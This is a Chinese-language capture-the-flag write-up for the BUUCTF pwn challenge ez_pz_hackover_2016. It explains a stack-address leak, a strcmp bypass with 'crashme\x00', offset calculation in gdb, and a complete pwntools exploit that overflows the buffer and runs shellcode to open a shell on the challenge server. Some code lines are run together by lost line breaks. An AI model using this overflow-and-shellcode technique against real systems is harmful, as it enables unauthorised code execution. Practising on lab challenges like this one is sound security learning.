Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode；调试计算

32位，开启了RELRO保护,堆栈地址随机化

没有开启nx保护,可利用写入shellcode来获取shell

一开始给我们输出了参数s的地址

strcmp函数:

两个字符串自左向右逐个字符相比（按ASCII值大小相比较），直到出现不同的字符或遇’\0’为止

也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查，之后执行vuln函数

dest大小根本不是0x32，要动态调试看大小其实是 0x16

利用思路：

1.往s参数里写入shellcode，执行vuln函数后让dest造成溢出

2.将返回地址修改为shellcode的地址去执行

调试过程

1.找我们写入的shellcode在栈上的地址位置

在ida里找一个nop指令来下断点，我这边是利用0x8048600这个地址的nop

from pwn import *
p=process('./ez_pz_hackover_2016')
context.log_level='debug'gdb.attach(p,'b *0x8048600')#利用gdb动调，在0x8048600处下了个断点p.recvuntil('crash: ')
stack=int(p.recv(10),16)#接收回显的参数s在栈上的地址，长度是10，以16进制表示
print hex（stack）payload='crashme\x00'+'aaaaaa'#前面的crashme\x00绕过if判断#后面的aaaa是测试数据，随便输入的，我们等等去栈上找它的地址#利用它找到返回地址在栈上的地址，将返回地址覆盖为shellcode
p.sendline(payload)pause()#linxu下的暂停程序命令

按c执行下一步

输入stack30查看栈

ebp的位置是0x38,我们输入参数的位置是0x22.

看到了我们输入的数据，‘ashme’，由于对齐的原因，没有跟 ‘cr’ 连在一起，我们看它上一行0x63就是 ‘c’ ，0x72是 ‘r’
，由于小端序的原因，所以是这样的

我们看左边是0x20，但其实是0x22 ------- 0x7263f7f1 是从63开始读入数据的即 23 22 21 20

ebp距离我们的输入点的距离是0x38-0x22=0x16;

shellcode应该写在ebp之后（32位程序的ebp占4个字节），就是在0x16+0x4处

在覆盖完ebp后的返回地址应该填写指向shellcode的地址

payload=‘crashme\x00’+‘a’*(0x16+0x4-8)+p32(addr)

-8是 ‘crashme\x00’ 占用了8字节,+4是用来覆盖ebp的

2.找到指向shellcode的地址

虽然地址会随机化但是偏移量不会变

开始得到了一个chall函数s栈上的地址0xffe1d35c

它在参数s栈上的相对位置是0x20

返回地址在参数s栈上的相对位置是0x3c（ebp+4）

输入点距离我们的返回地址的距离是0x3c-0x20=0x1c

用0xffe1d35c-0x1c来表示返回地址

from pwn import *r=remote('node3.buuoj.cn',26843)
#p=process('./ez_pz_hackover_2016')
context.log_level='debug'#gdb.attach(p,'b *0x8048600')r.recvuntil('crash: ')
stack=int(r.recv(10),16)
shellcode=asm(shellcraft.sh())#利用pwntools自动生成shellcode
#print hex(stack)payload='crashme\x00'+'a'*(0x16-8+4)+p32(stack-0x1c)+shellcode
r.sendline(payload)#pause()r.interactive()